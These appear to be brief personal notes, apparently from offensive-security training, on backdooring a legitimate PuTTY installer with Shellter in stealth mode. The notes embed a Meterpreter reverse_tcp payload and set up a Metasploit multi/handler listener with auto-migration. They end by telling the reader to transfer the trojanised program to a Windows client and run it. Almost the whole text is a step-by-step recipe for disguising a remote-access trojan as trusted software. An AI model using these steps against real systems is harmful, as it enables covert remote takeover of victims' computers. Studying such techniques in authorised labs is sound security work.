Using Shellter tool
- apt install shellter to install
- It is window tool , so use wine tool
apt insatll wine
wine shellter
- Select A for automatic mode
- Enter path of target window software (Download putty from https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html)
- Enable stealth mode with Y
- Type L for selecting listed payload and then index no. like 1
- type LHOST and LPORT
- Enable meterpreter listener
kali@kali:~$ msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 10.11.0.78
msf exploit(multi/handler) > show options
msf exploit(multi/handler) > set AutoRunScript post/windows/manage/migrate
msf exploit(multi/handler) > exploit
- transfer the malicious software to the testing window client and run